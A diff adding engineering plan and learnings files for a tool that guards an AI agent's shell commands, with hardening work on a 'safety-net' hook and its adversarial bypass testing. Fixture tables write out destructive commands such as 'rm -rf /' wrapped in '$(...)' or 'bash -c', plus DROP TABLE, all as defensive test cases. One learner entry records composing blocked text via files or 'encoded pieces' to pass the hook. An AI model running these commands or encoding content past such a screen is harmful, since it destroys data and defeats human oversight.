+| 5 | Green fixtures ≠ working guard: 138 fixtures green while two HIGH bypass classes existed; adversarial bypass hunt with live reproducers required | **merged-into `learner-9df011bc59dd`** (three-way supersede of `ci-gate-prove-execution` + `redleg-validation-catches-vacuous-gates` — same failure class: control looked green but was vacuous/bypassable; confidence high — #1754, #1753, #1976/security-review F1+F2) |
+| 6 | reset --hard guard false-positives on untracked-only dirty trees; `git checkout -B` is the non-destructive equivalent; possible hook exemption | **budget-blocked** — writer rejected append (4077/4000). Entry drafted below, `scope:upstream-candidate` (hook refinement is gardener-routed; per capture-only mandate no issue was filed). Confidence low (single occurrence) |
+| 7 | Stale CHANGES_REQUESTED after clean re-review needs explicit dismissal; auto-merge never fires alone | **merged-into `learner-0d2a4f342674`** (supersedes `dismiss-review-after-push-lands`; merged rule keeps the ordering hazard — dismiss only after fix verified on remote head — and adds that dismissal is required at all; confidence high — #1771/#1772 + #1976) |
+
+## Entries persisted (as written by the contract)
+
+- `learner-0d2a4f342674` — "A stale CHANGES_REQUESTED blocks auto-merge until explicitly dismissed with a documented reason — but dismiss only after the fix commit is verified on the remote head, because dismissal arms auto-merge instantly." (high; prov #1771, #1976)
+- `learner-399a16b6f4ad` — "Before pushing a shared or PR branch, fetch first — automations and server-side merges move remote branches mid-flight; recover with checkout -B onto the remote head, cherry-pick local commits, push a single-commit range." (high; prov #1779, #1976)
+- `learner-9df011bc59dd` — "A gate must prove it works, not just run green: pair invocations with success-marker assertions, red-leg a deliberate failure before trusting it, and for pattern-matching guards hunt bypasses with live reproducers." (high; prov #1754, #1753, #1976)
+- `learner-fffa7ca43d81` — "The safety-net hook text-scans Bash tool calls — commands quoting dangerous literals (PR bodies, reviews) get blocked; compose it via Write + --body-file or encoded pieces, never inline in Bash." (medium; prov #1960)
+
+## Budget-blocked drafts (ready to persist once headroom exists)
+
+```json
+{"id":"learner-9d1e3d4c7fda","rule":"Node CLIs whose stdout is consumed by shell substitution must set process.exitCode, never call process.exit() after piped writes — exit() truncates stdout at the pipe buffer and a parser of truncated JSON can fail open.","why":"lisa-work-item.mjs output truncated at 512 bytes under $(...) capture during the #1960 flow.","provenance":["https://github.com/CodySwannGT/lisa/issues/1960","scripts/lisa-work-item.mjs","scope:upstream-candidate"],"first_learned":"2026-07-22","last_confirmed":"2026-07-22","confidence":"medium"}
+{"id":"learner-40cd26e15dd5","rule":"The safety-net reset --hard guard trips on any dirty tree, including untracked-only dirt; when tracked files are clean, use git checkout -B <branch> <ref> as the non-destructive equivalent.","why":"Untracked .lisa/*.md flow artifacts made the tree read dirty during #1960 although reset was safe for tracked state.","provenance":["https://github.com/CodySwannGT/lisa/issues/1960","plugins/src/base/hooks/parity-safety-net.sh","scope:upstream-candidate","https://github.com/CodySwannGT/lisa/pull/1976"],"first_learned":"2026-07-22","last_confirmed":"2026-07-22","confidence":"low"}
+```
+
+## Upstream candidates (marked, never filed — gardener routes these)
+
+- **Item 4:** `scripts/lisa-work-item.mjs` (and any Lisa Node CLI consumed via `$(...)`) should use `process.exitCode`, not `process.exit()` — a security gate parsing its truncated JSON can fail open.
+- **Item 6:** `parity-safety-net.sh` guard 3 (`reset --hard/--merge` on dirty tree) could exempt untracked-only dirt. Chesterton's-fence note: the dirty check exists to protect uncommitted work; untracked files ARE untouched by `reset --hard` on tracked paths, so the exemption is sound but needs its own fixture pair.
+
+Per the learner contract these were **not** filed as issues; the team lead may
+file them directly, or they flow through the gardener (`/lisa:learnings:audit`)
+once the entries land.
+
+## Advisory routing (skill-evaluator, advisory-only — promotion stays human-gated)
+
+| # | Candidate | Recommended rung | Scope |
+|---|-----------|------------------|-------|
+| 1 | validate-push full-range walk / new-branch recovery | KEEP-IN-LEDGER (interim, expire when #1956 fix is a merge ancestor) | project |
+| 2 | branches move underneath; checkout -B + cherry-pick | KEEP-IN-LEDGER (consolidate — done, `learner-399a16b6f4ad`) | project |
+| 3 | safety-net blocks quoted dangerous literals | EXECUTABLE-CONTROL — relocate the sanctioned workaround into the hook's own block diagnostic ("compose via Write + --body-file; the hook screens Bash command text, not file contents"); deliberately do NOT document base64 assembly (bypass technique) | upstream |
+| 4 | process.exit truncates piped stdout | EXECUTABLE-CONTROL — enable `unicorn/no-process-exit: error` in Lisa's `.oxlintrc.json` + TypeScript-stack template. NOTE: `lisa-work-item.mjs` is ALREADY fixed (uses `process.exitCode`, zero `process.exit(` remain); the lint rule prevents recurrence fleet-wide | upstream |
+| 5 | pattern controls need adversarial bypass hunt | SKILL — add a "Pattern-matching controls: mandatory bypass hunt" section to existing `lisa-security-review/SKILL.md` (today it has ZERO mentions of bypass hunting; the #1960 hunt came from plan acceptance criteria, not the skill). Green fixture suites inadmissible as bypass evidence; every claimed gap needs a live reproducer | upstream |
+| 6 | reset --hard guard untracked-only false positive | EXECUTABLE-CONTROL — guard 3 uses bare `git status --porcelain` (includes `??` lines); change to `--untracked-files=no` since `reset --hard` factually does not delete untracked files; Chesterton's fence satisfied (guard intent preserved for tracked changes); add allow/block fixture pair | upstream |
+| 7 | stale CHANGES_REQUESTED needs dismissal | RETIRE — procedural half already owned by `lisa-drive-pr-to-merge/SKILL.md` (explicit `gh api …/dismissals` step, L227–231); ordering hazard owned by the ledger entry | project |
+
+**Divergences from the capture pass above (for the lead to weigh):**
+
+- **Item 1:** evaluator says keep an interim ledger entry expiring with #1956;
+  the capture pass dropped it (transient + zero budget headroom). If the lead
+  wants it, the drafted rule is in the evaluator output; it cannot fit until
+  gardener relief lands.
+- **Item 7:** evaluator says RETIRE (skill-owned). The capture pass had already
+  consolidated it into `learner-0d2a4f342674` (net: still one entry, refreshed
+  provenance/confidence — no sibling was created). Compatible outcomes; if the
+  lead prefers strict retirement, the merged entry can be reverted to the prior
+  wording at gardener time.
+- Items 3/4/5/6 upstream artifacts all fan out (hook copies, oxlint templates,
+  skill copies) — each needs source + fan-out + fixtures + upstream-evidence
+  manifest in the same commit, per PROJECT_RULES.

--- a/.lisa/plan-1956.md
+++ b/.lisa/plan-1956.md
@@ -1,0 +1,32 @@
+# Plan: work-item-sync-lanes — CodySwannGT/lisa#1956
+
+- **Work item:** CodySwannGT/lisa#1956 (bug; work_item_ref `CodySwannGT/lisa#1956`)
+- **Flow:** Implement / **Fix** — Reproduce sub-flow mandatory before any fix.
+- **Base branch:** no target environment on the issue → remote default `main` (fallback recorded). Branch: `fix/1956-work-item-sync-lanes` from latest origin/main.
+- **Tracking:** no TaskCreate in runtime — this file. Roster: `.lisa/roster-1956.md`.
+
+## Scope decision (from the issue's "any of" list + comment)
+
+Implement the root-cause set: **Fix 1** (rebase-aware `assertStateBranch` via rebase-merge/rebase-apply head-name), **Fix 5** (push-range excludes commits reachable from the remote default branch), **Fix 4** (safety-net allows `git rebase --abort` when no conflict resolutions would be lost, else still blocks), plus **Fix 3 rewritten**: the lisa-implement skill's branch step documents the now-working rebase lane and the merge lane both (not "merge until fixed" — 1+5 make both lanes work). **Fix 2 (trailer-as-authority on detached HEAD) is explicitly NOT implemented**: it's an alternative to Fix 1 and weaker (trailer is authored content; the rebase head-name is git-owned state) — record as rejected-alternative in the PR.
+
+## Reproduce sub-flow (must fail before fixes)
+
+Repro tests in the existing suites' conventions (tests/unit/scripts/lisa-work-item.test.ts — 730-line harness exists; hook fixtures in tests/helpers/safety-net-guard-fixtures.ts):
+- R1 (rebase lane): scratch repo + binding; simulate mid-rebase state (`.git/rebase-merge/` with `head-name` = bound branch, detached HEAD) → `validate-commit`/`prepare-commit-msg` path currently throws "Cannot use a work-item binding from detached HEAD".
+- R2 (merge lane): scratch repo with a fake "main" carrying a commit whose trailer references a CLOSED issue (stub the gh call per existing test conventions) merged into the bound branch → `validate-push` range currently includes the foreign commit and rejects.
+- R3 (recovery lane): safety-net fixture `git rebase --abort` currently BLOCK; post-fix: ALLOW when rebase state has no conflict resolutions, BLOCK when it does (fixture pair on real hook with temp rebase state).
+
+## Effective completion condition
+
+**End state:** in a bound worktree, all three sync lanes work: a rebase onto a moved base completes (every pick commits), a merge-with-base pushes (foreign base commits exempt; branch-authored commits still strictly validated), and a clean-rebase abort is agent-recoverable — with zero weakening for branch-authored commits (missing/mixed/closed Work-Item still rejected).
+**Proofs:**
+1. `bunx vitest run tests/unit/scripts/lisa-work-item.test.ts tests/unit/hooks/` — all green including new R1/R2/R3-derived cases (red-first proven).
+2. Live end-to-end in a scratch git repo (verifier): bind → branch → simulate base advance with a foreign closed-item commit → `git rebase origin/main` completes under the commit hooks; `git merge` variant pushes through validate-push (stubbed remote); negative controls: branch-authored commit with closed/missing Work-Item still rejected; mixed branch-authored refs still rejected.
+3. Real hook drive: `rebase --abort` fixture pair (allow-clean / block-with-resolutions) exit codes observed.
+4. Constraints: parity drift gate exit 0; `scripts/lisa-work-item.mjs` and `all/copy-overwrite/scripts/lisa-work-item.mjs` updated consistently (note: they currently differ — investigate the delta first, fix in the source of truth, and reconcile the applied copy the sanctioned way); skill-text change matches shipped behavior; all quality gates green.
+
+## Tasks
+- T1 Explore: validator internals + test harness conventions + the scripts/ vs copy-overwrite delta (why do they differ; which does the unit test import). → .lisa/research-1956.md
+- T2 bug-fixer: R1/R2/R3 red → fixes 1,5,4 → green; skill-text update (Fix 3-rewritten); both file copies reconciled.
+- T3 security-specialist: adversarial review — the two gate relaxations must not open laundering lanes (foreign-commit exemption must require reachability from the remote default branch, not just any remote ref the pusher controls... note --remotes=origin includes the branch being force-updated? analyze; abort-allowance must fail closed on ambiguous rebase state).
+- T4 quality-specialist review; T5 verifier verdict (.lisa/verification-status.json) + spec-conformance; T6 push/PR/drive-to-merge (lead); T7 learner.

--- a/.lisa/plan-1957.md
+++ b/.lisa/plan-1957.md
@@ -1,0 +1,20 @@
+# Plan: linear-bare-repo-label — CodySwannGT/lisa#1957
+
+- **Work item:** CodySwannGT/lisa#1957 (bug). **Flow:** Implement/Fix, Reproduce-first.
+- **Base:** main (no target env on issue; fallback recorded). Branch `fix/1957-linear-bare-repo-label` (includes #1979 merge 8ae55057d).
+- **Decision:** Option A — `assertRepoScope` accepts the bare repo-name label as satisfying repo scope, mirroring the intake-side rule (match both `repo:<name>` and bare `<name>`). Option B (auto-add `repo:*` at claim) REJECTED: heavier, vendor-spanning, and it mutates tracker labels — collapsing the documented taxonomy where bare = Sentry provenance, `repo:*` = planned work. The fix must be read-side only: bind ACCEPTS bare labels, never rewrites them.
+
+## Reproduce (must fail first)
+- R1: unit test in tests/unit/scripts/lisa-work-item.test.ts, Linear-provider contract, work item carrying ONLY the bare repo-name label (e.g. `frontend` for a repository whose scope name is `frontend`) → bind/validate path currently rejects with exactly "is not scoped to repository frontend; require label repo:frontend". RED = expect acceptance post-fix.
+- Controls that must STAY rejected: no scope label at all; wrong repo's label (`backend` bare or `repo:backend` when scope requires frontend); unrelated bare label that is not the repo name.
+- GitHub-path parity: confirm (pin) whether the GitHub lane should also accept bare labels — mirror the intake rule uniformly unless the Explore step finds a reason GitHub must stay strict (components exist there; document whichever way it lands).
+
+## Effective completion condition
+**End state:** a Linear work item labeled only with the bare repo name binds and validates in that repo; items without any matching scope label still reject with the existing message (now naming both accepted forms).
+**Proofs:** (1) R1 + controls green in lisa-work-item.test.ts; full `bun run test` zero failures (the #1956 lesson — full suite before commit for any behavior/wording change). (2) Live simulation: scratch repo + crafted binding/stub with bare-label Linear payload → bind succeeds; wrong-label control rejects (observed outputs). (3) Constraints: shim untouched; error message updated to name both accepted forms (docs↔code guards updated if any pin the old message — grep first); manifest regenerated with the copy-overwrite edit; drift gate exit 0.
+
+## Tasks
+- T1 Explore → .lisa/research-1957.md: assertRepoScope + repositoryIsIdentity semantics, exact label normalization (case, trim), the Linear bind path's label extraction, the intake-side bare-label rule text to mirror, existing tests pinning the rejection message, whether GitHub lane shares the same code path (uniform vs vendor-forked fix).
+- T2 bug-fixer: R1 red → Option-A fix in all/copy-overwrite/scripts/lisa-work-item.mjs (source only) → green; mutation-proof (accept-any-label mutant must fail the wrong-label control).
+- T3 quality review (with security lens: no cross-repo mis-scoping — bare-label match must be exact-name, case-handling documented, no substring/prefix acceptance).
+- T4 verifier verdict → .lisa/verification-status.json; T5 lead: push/PR/drive; T6 learner.

--- a/.lisa/plan-1958.md
+++ b/.lisa/plan-1958.md
@@ -1,0 +1,32 @@
+# Plan: heredoc-classifier-fps — CodySwannGT/lisa#1958
+
+- **Work item:** CodySwannGT/lisa#1958 (enhancement). **Flow:** Implement/Improve with repro-first discipline (security classifier change).
+- **Base:** main (post-#1981, includes 209af4609). Branch `feat/1958-heredoc-classifier-fps`.
+- **Staleness:** every line anchor in the issue predates today's #1976/#1979 hook rewrites — T1 re-locates all anchors and re-reproduces both behaviors against HEAD before any design is trusted.
+
+## Scope
+
+1. Single, closed, **quoted-delimiter** heredoc reclassified from MALFORMED-on-payload-substitution-tokens to a class that passes the payload through to the content guards (payload provably non-expanding ⇒ backticks/`$(` inert). Fail-closed preserved: unquoted or partially-quoted delimiters, unclosed heredocs, and parse ambiguity remain MALFORMED.
+2. Chained heredocs (all-quoted): implement ONLY if the classifier structure makes it a natural extension with airtight parsing; otherwise explicitly out-of-scope with reason (issue's confident ask is the single case). Security review gets veto.
+3. `block_heredoc()` remediation conditional: `git commit` in command → current git-commit-F text; else → "write the payload to a file with the Write tool and execute the file".
+4. NOT in scope: widening the `gh issue|pr` allowlist; any change to unquoted-heredoc handling.
+
+## Repro-first (red before code, all against CURRENT HEAD)
+
+- F1: `python3 <<'EOF'` payload containing markdown backticks (the literal TUN-242-era shape) → currently blocked MALFORMED; post-fix: allowed (exit 0) because payload has no guarded content.
+- F2 (CRITICAL control): quoted-delimiter heredoc whose payload contains a guarded string (catastrophic rm form / DROP TABLE) → BLOCKED before AND after (proves reclassification does not bypass content guards).
+- F3: UNQUOTED-delimiter heredoc with `$(...)` in payload → blocked before and after (expansion active; fail-closed preserved).
+- F4: partially-quoted / escaped-delimiter forms (`<<EO'F'`, `<<\EOF` — note `<<\EOF` IS non-expanding per POSIX: decide handling from the parser's actual capability; document) → conservative default MALFORMED unless parser proves non-expanding.
+- F5: unclosed quoted heredoc → MALFORMED (unchanged).
+- F6: remediation text — non-commit heredoc block shows the Write-tool guidance; `git commit -m "$(cat <<EOF...)"` shape shows the git-commit-F text.
+- F7 (if chained implemented): two all-quoted heredocs → allowed when payloads clean; mixed quoted+unquoted → MALFORMED.
+
+## Effective completion condition
+
+**End state:** the exact inline-script shape that burned agents on 2026-07-22 (`python3 <<'EOF'` with markdown backticks in string literals) executes through the hook, while every expanding, ambiguous, or guarded-content heredoc still blocks, and denial messages name the right remedy for the command shape.
+**Proofs:** (1) full fixture suite green with F1–F7 red-first history; (2) live hook drives of F1/F2/F3/F6 with observed exit codes + messages; (3) full `bun run test` zero failures; drift gate exit 0; check:plugins post-commit; (4) constraint: no change to the gh allowlist path; python classifier changes covered by its own unit suite if one exists (T1 to locate).
+
+## Tasks
+- T1 Explore → .lisa/research-1958.md: current anchors (block_heredoc, has_active_command_substitution, marker rules, allowlist), the heredoc.py test suite location + conventions, exact current remediation strings, quoting-detection capability of the parser (what token info exists for delimiters), and the multi-heredoc feasibility judgment.
+- T2 builder: F1–F7 red → implement → green; mutation-proof the quoted-detection (treat unquoted as quoted mutant must fail F3).
+- T3 security review (parser-soundness attack pass: crafted delimiters, nested/overlapping heredocs, CRLF, whitespace tricks); T4 quality review; T5 verifier verdict; T6 lead ship; T7 learner.

--- a/.lisa/plan-1959.md
+++ b/.lisa/plan-1959.md
@@ -1,0 +1,26 @@
+# Plan: learnings-ledger-budget — CodySwannGT/lisa#1959
+
+- **Work item:** CodySwannGT/lisa#1959 (bug). **Flow:** Implement/Fix, repro-first.
+- **Base:** main (post-#1958, a77ea85eb). Branch `fix/1959-learnings-ledger-budget`.
+- **LIVE repro baseline:** the committed ledger `.lisa/PROJECT_LEARNINGS.md` sits at **8 entries / 3999 bytes** — saturated against the 4000-byte cap at well under the 20-entry cap. Nine consolidation drafts from this session's four learner passes are stranded no-budget.
+
+## Scope (issue offers "any of" 4; ship the highest-value coherent cluster)
+
+- **Fix 1 (root cause) — REQUIRED:** the two caps contradict; at ~350-450 B/entry the byte cap binds at ~10 entries. Derive the byte budget from the entry cap (e.g. `MAX_ENTRIES * PER_ENTRY_BYTE_ALLOWANCE`, ~450 → 9000+), OR raise it to a value that lets ~20 real entries fit. Prefer DERIVED so the two caps can never re-diverge.
+- **Fix 2 (saturation signal) — REQUIRED (the title's second half: "saturation has no signal"):** when a capture drops entries for budget, emit a gardener-queue signal ("ledger saturated — promote or retire") through the SAME channel the gardener already consumes (research to identify it — reuse, do not invent). Must be idempotent — do NOT emit on every capture; only on a drop, and not duplicate an open signal.
+- **Fix 3 (durable overflow) — INCLUDE IF it composes cleanly:** persist no-budget drops to an overflow file the gardener drains, not just capture-report text. Directly rescues the 9 stranded drafts. Evaluate in research: if it's a natural small addition to the persist path, include; else defer to a follow-up.
+- **Fix 4 (stable entry ids across supersede) — DEFER:** distinct concern (id churn breaking external refs); file as follow-up unless research shows it's trivially coupled.
+
+## Reproduce-first (red before code)
+- R1: a ledger at the entry cap's worth of real ~400 B entries totals >4000 B → the current budget check FAILS (byte cap) though entry count ≤ 20. Encode as a test over check-learnings-budget with a fixture ledger. Post-fix: passes (budget derives from entry cap).
+- R2: a capture that must drop a durable entry for budget currently produces NO gardener signal / NO durable overflow record (only report text). Post-fix: emits the idempotent signal (+ overflow record if Fix 3 in).
+- Controls: an over-ENTRY-cap ledger (>20 entries) still fails (the entry cap remains enforced); a normal small ledger passes with no spurious signal.
+
+## Effective completion condition
+**End state:** ~20 real 350-450 B entries fit under the (derived) budget; a budget-forced drop emits exactly one idempotent gardener signal (and, if Fix 3, a durable overflow record); the 20-entry cap and normal cases are unchanged.
+**Proofs:** (1) R1/R2 + controls green; full `bun run test` zero failures. (2) Live: run `bun run check:learnings-budget` against a 20-entry ~400 B/entry fixture → passes; against a >20-entry fixture → fails; simulate a drop → signal emitted once, second run no dup. (3) Dogfood: after the fix, this session's stranded drafts (via the 1959 learner, T-learner) persist under the new budget. (4) Constraints: contract doc (the rendered contract / SKILL) updated to match; no change to unrelated gardener behavior; drift/plugins/manifest gates green.
+
+## Tasks
+- T1 Explore → .lisa/research-1959.md: the two caps' exact definitions + enforcement sites (check-learnings-budget.ts, the ledger contract doc/SKILL, persistLearningEntry/persistConsolidatedLearning), how bytes-per-entry is computed, the EXISTING gardener-queue channel to reuse for the signal, whether an overflow-file pattern already exists, test conventions for the budget script, and a recommendation on derived-vs-raised budget + Fix-3 inclusion.
+- T2 bug-fixer: R1/R2 red → Fix 1 + Fix 2 (+Fix 3 if research greenlights) → green; mutation-proof (revert derivation → R1 fails; disable signal → R2 fails).
+- T3 quality review (idempotency/spam of the signal, external-artifact soundness, contract-doc accuracy). T4 verifier verdict. T5 lead ship. T6 learner (dogfood: persist the stranded drafts under the new budget; file Fix-4 follow-up).

--- a/.lisa/plan-1960.md
+++ b/.lisa/plan-1960.md
@@ -1,0 +1,56 @@
+# Plan: safety-net-guard-parity — CodySwannGT/lisa#1960
+
+- **Work item:** CodySwannGT/lisa#1960 (tracker=github; work_item_ref `CodySwannGT/lisa#1960`)
+- **Flow:** Implement. **Work type:** Improve (guard-parity hardening + duplicate retirement; not a Fix — no incorrect behavior to reproduce, the double-screening and guard gaps are enumerated in the issue).
+- **Runtime task tracking:** no TaskCreate tool in this runtime — tasks tracked in this file; roster in `.lisa/roster-1960.md`.
+
+## Base branch resolution
+
+Issue has no `## Target Backend Environment` section and `.lisa.config.json` has no `deploy.branches` map for lisa. **Fallback (recorded per flow rules): base = remote default branch `main`.**
+
+**Sequencing dependency:** PR #1961 (issue #1955, auto-merge armed, CI in flight) touches the same surfaces this plan edits (`scripts/install-claude-plugins.sh`, merge settings templates, parity skill notes, `.husky/pre-push.local` gate). Implementation branch `feat/1960-safety-net-guard-parity` is cut from `origin/main` **after #1961 merges** to avoid a guaranteed conflict; research tasks proceed immediately. If #1961 fails CI, unblock it first (its watch loop is active in this session).
+
+## Effective completion condition
+
+**End state:** every Bash command in a lisa-governed Claude session is screened exactly once, by a Lisa hook whose guard set is a superset-of-material-guards of upstream safety-net 1.0.6 — proven by fixtures, not assertion.
+
+**Proof commands (independent verifier observes output):**
+1. Fixture matrix through the REAL hook: `bash tests/fixtures/... / vitest run tests/unit/hooks/parity-safety-net*.test.ts` — every upstream-1.0.6 material guard case exits non-zero (blocked) via `printf '{"tool_name":"Bash","tool_input":{"command":"…"}}' | bash plugins/lisa/hooks/parity-safety-net.sh`; every paired benign case exits 0. Includes at minimum: `git checkout -- <path>` (block) vs `git checkout -b x` (allow); `git stash clear`/`git stash drop` (block) vs `git stash push/pop` (allow); flag-order/wrapper `rm` variants (`rm -r -f /`, `rm -rf .`, `bash -c 'rm -rf ~'`) (block) vs `rm -rf ./node_modules` (allow); interpreter one-liners invoking destructive shell (block) where absorbed.
+2. `grep -c "safety-net@cc-marketplace" scripts/install-claude-plugins.sh` shows it only in the retirement loop, not the install list; `bunx vitest run tests/unit/scripts/install-claude-plugins-self.test.ts` green with retirement assertions (mutation-proven once: removing the uninstall fails exactly the new assertion).
+3. `node scripts/plugin-parity-drift.mjs` exits 0 (gate stays green; safety-net parity skill pin stays 1.0.6).
+4. All `enabledPlugins` templates show `"safety-net@cc-marketplace": false` (grep across `*/merge/.claude/settings.json`, `.claude/settings.json`, `.claude-pr/.claude/settings.json`).
+5. PR merged into main with checks green; post-merge `git log origin/main` contains the merge SHA.
+
+**Constraints that must hold:** no existing built-in guard relaxes (all pre-existing block fixtures still block); `.husky/pre-push` template block untouched; no port/copy of upstream plugin code (reimplementation only); pre-push parity gate passes throughout.
+
+## Tasks
+
+### T1 — Guard-set audit: upstream 1.0.6 vs Lisa hook (research)
+Owner: Explore. Status: pending
+```json
+{"plan":"safety-net-guard-parity","type":"spike","acceptance_criteria":["Complete inventory of upstream safety-net 1.0.6 protections (from cache tree: dist/bin, README, tests) mapped against Lisa parity-safety-net.sh built-ins","Each upstream guard classified: already-covered | material-absorb | deliberately-skip (with reason, e.g. paranoid-mode-only)","Findings written to .lisa/research-1960-guard-audit.md"],"relevant_documentation":"~/.claude/plugins/cache/cc-marketplace/safety-net/1.0.6/ (upstream, incl. dist/bin/cc-safety-net.js, README.md); plugins/src/base/hooks/parity-safety-net.sh; plugins/src/base/skills/lisa-parity-safety-net-rules/SKILL.md; parity/plugin-routing/safety-net@cc-marketplace.md; issue #1955 addendum pattern","testing_requirements":[],"skills":[],"learnings":[],"verification":{"type":"documentation","command":"cat .lisa/research-1960-guard-audit.md","expected":"classification table exists covering every upstream protection with absorb/skip verdicts and concrete command examples per guard"}}
+```
+
+### T2 — Fixture matrix design (test strategy)
+Owner: lisa:test-specialist. Status: pending — depends T1
+```json
+{"plan":"safety-net-guard-parity","type":"task","acceptance_criteria":["Allow/block fixture matrix covering every material-absorb guard from T1 plus every pre-existing built-in guard (regression floor)","Each fixture drives the REAL hook binary via PreToolUse JSON on stdin and asserts exit code","Matrix includes near-miss allow cases for every block (anti-overblocking)"],"relevant_documentation":"T1 output; existing hook test location conventions (tests/unit/hooks/ if present); lisa-parity-safety-net-rules SKILL.md check() pattern","testing_requirements":["vitest suite executing the real hook via bash subprocess"],"skills":[],"learnings":[],"verification":{"type":"cli-test","command":"bunx vitest run <new hook fixture suite>","expected":"suite runs the real hook for every fixture; all pass; count matches matrix"}}
+```
+
+### T3 — Absorb material guards into parity-safety-net.sh (TDD)
+Owner: lisa:builder. Status: pending — depends T2, blocked-until #1961 merged (branch cut)
+```json
+{"plan":"safety-net-guard-parity","type":"story","acceptance_criteria":["All material-absorb guards implemented in plugins/src/base/hooks/parity-safety-net.sh (reimplemented, no upstream code ported)","Entire T2 fixture suite green; every pre-existing guard fixture still blocks","SKILL.md built-in guard list updated to match; build:plugins regenerates variants"],"relevant_documentation":"T1 audit, T2 matrix","testing_requirements":["T2 suite green in same commit as guard changes"],"skills":[],"learnings":[],"verification":{"type":"cli-test","command":"bunx vitest run <hook suite> && bun run check:plugins","expected":"exit 0 both; fixture count unchanged from T2 matrix"}}
+```
+
+### T4 — Retire safety-net@cc-marketplace (mirror #1955)
+Owner: lisa:builder. Status: pending — depends T3
+```json
+{"plan":"safety-net-guard-parity","type":"story","acceptance_criteria":["Removed from install list; added to version-gated retirement loop in install-claude-plugins.sh","enabledPlugins flipped to false in all ten settings templates","routing artifact parity/plugin-routing/safety-net@cc-marketplace.{md,json} updated with re-review addendum; parity skill note updated if guard list changed; evidence manifest regenerated","install-claude-plugins-self.test.ts pins retirement both directions (uninstall on sync; no uninstall on same-version skip)"],"relevant_documentation":"#1955 commits 1b92d6073/2e5a7aacb (the exact pattern)","testing_requirements":["mutation-proof the retirement assertion once (remove loop -> exactly one test fails -> restore)"],"skills":[],"learnings":[],"verification":{"type":"cli-test","command":"bunx vitest run tests/unit/scripts/install-claude-plugins-self.test.ts && node scripts/plugin-parity-drift.mjs && bun run check:upstream-evidence-manifest","expected":"all exit 0; drift table shows safety-net pin 1.0.6 ok"}}
+```
+
+### T5 — Review + independent verification + ship
+Owner: lisa:security-specialist + lisa:quality-specialist (review), lisa:verification-specialist (verdict), lead (PR). Status: pending — depends T4
+```json
+{"plan":"safety-net-guard-parity","type":"task","acceptance_criteria":["Security review: no guard weakened, absorbed guards not trivially bypassable (quoting/wrapper variants attempted)","Quality review: shell conventions, doc accuracy","verification-status.json all-pass verdict written by verification-specialist (not the implementer)","spec-conformance verdict vs the 3 AC bullets","PR opened to main with work-item ref, auto-merge, driven to merge; learnings processed by lisa:learner"],"relevant_documentation":"completion condition above","testing_requirements":[],"skills":["lisa:lisa-git-submit-pr","lisa:lisa-drive-pr-to-merge"],"learnings":[],"verification":{"type":"cli-test","command":"cat .lisa/verification-status.json; gh pr view <n> --json state,mergedAt","expected":"verdict status=pass with per-criterion evidence; PR state MERGED"}}
+```

--- a/.lisa/plan-1982.md
+++ b/.lisa/plan-1982.md
@@ -1,0 +1,117 @@
+# Plan: 1982-content-guard-subst-in-double-quotes
+
+Work item: CodySwannGT/lisa#1982 · tracker: github · work type: **Fix (bug)** · flow: Implement
+Base branch: `main` (no environment stated → remote default; recorded fallback assumption).
+Feature branch: `fix/1982-content-guard-subst-in-double-quotes` (off origin/main @ 4dc6056af, conflict-free — fresh worktree).
+Worktree: /Users/cody/workspace/lisa/.claude/worktrees/1982-content-guard-subst
+Roster Decision: .lisa/roster-1982.md
+Input bundle: .lisa/input-1982.md
+
+## Effective completion condition
+
+**End state:** Piping a PreToolUse Bash payload whose command is `echo "$(rm -rf /)"` into the REAL built hook `plugins/lisa/hooks/parity-safety-net.sh` produces a BLOCK decision (deny/exit-2 class), while `echo '$(rm -rf /)'` (single-quoted, inert) and a benign `echo "$(date)"` remain ALLOWED — proven by fixture rows executed through tests/helpers/safety-net-guard-harness.ts and by a direct hook invocation whose output appears in the transcript.
+
+**Proof commands:**
+1. Direct: `printf '%s' '{"tool_name":"Bash","tool_input":{"command":"echo \"$(rm -rf /)\""}}' | plugins/lisa/hooks/parity-safety-net.sh; echo "exit=$?"` → block (exit 2 or deny JSON). Same invocation with the single-quoted/benign variants → exit 0 allow.
+2. Harness: named vitest output showing the new SUBST_BOUNDARY fixture rows ran and passed in `bun run test` (and later in PR CI logs by name).
+
+**Constraints that must hold:**
+- No existing fixture row flips (no over-blocking beyond the documented text-scan class).
+- All four fanned hook copies byte-identical to plugins/src/base after `bun run build:plugins` (`bun run check:plugins` = in sync).
+- Quality gates green: `bun run test`, lint, typecheck. (Prerequisites, not verification.)
+- PR merges to main with CI green; issue #1982 verified closed post-merge.
+
+**Regression-coverage note:** No browser/device/e2e harness applies — the reported surface IS a CLI hook, and the fixture harness drives the real hook binary. That harness is the highest practical observation level; direct-hook invocation is the empirical system check. (Checked: repo has no UI surface for this component.)
+
+## Tasks
+
+### T1 — Research: map guard code paths and fixture matrix (Explore)
+```json
+{
+  "plan": "1982-content-guard-subst-in-double-quotes",
+  "type": "bug",
+  "acceptance_criteria": ["Root-cause lines in plugins/src/base/hooks/parity-safety-net.sh confirmed against current main", "Fixture matrix + harness mechanics documented", "relevant_documentation filled for T3"],
+  "relevant_documentation": "filled by T1 output",
+  "testing_requirements": [],
+  "skills": [],
+  "learnings": [],
+  "verification": {"type": "documentation", "command": "research notes returned to lead and appended to .lisa/plan-1982.md context", "expected": "confirmed line-level root cause + fixture insertion points"}
+}
+```
+
+### T2 — Threat-model scoping of substitution-wrapped forms (lisa:security-specialist)
+```json
+{
+  "plan": "1982-content-guard-subst-in-double-quotes",
+  "type": "bug",
+  "acceptance_criteria": ["Explicit block/allow boundary for $()-wrapped destructive forms (double-quoted executable vs single-quoted inert vs backtick vs nested)", "Overblocking risk assessed against existing allow fixtures"],
+  "relevant_documentation": ".lisa/input-1982.md (Finding 2 verbatim, positive controls)",
+  "testing_requirements": [],
+  "skills": [],
+  "learnings": [],
+  "verification": {"type": "documentation", "command": "threat-model verdict returned to lead", "expected": "enumerated block-list and allow-list of forms with executability rationale"}
+}
+```
+
+### T3 — Reproduce (failing fixtures) then fix (lisa:bug-fixer, TDD)
+```json
+{
+  "plan": "1982-content-guard-subst-in-double-quotes",
+  "type": "bug",
+  "acceptance_criteria": ["New SUBST_BOUNDARY block/allow fixture rows drive the REAL hook and FAIL before the fix (reproduction verified reliable)", "Fix in plugins/src/base/hooks/parity-safety-net.sh only; copies regenerated via bun run build:plugins; check:plugins in sync", "All acceptance criteria of #1982 met; no existing fixture flips"],
+  "relevant_documentation": "T1 + T2 outputs; .lisa/input-1982.md root-cause pointer (RM_CATASTROPHIC_TARGET trailing boundary L208-209; token-walk quote-strip L244-289)",
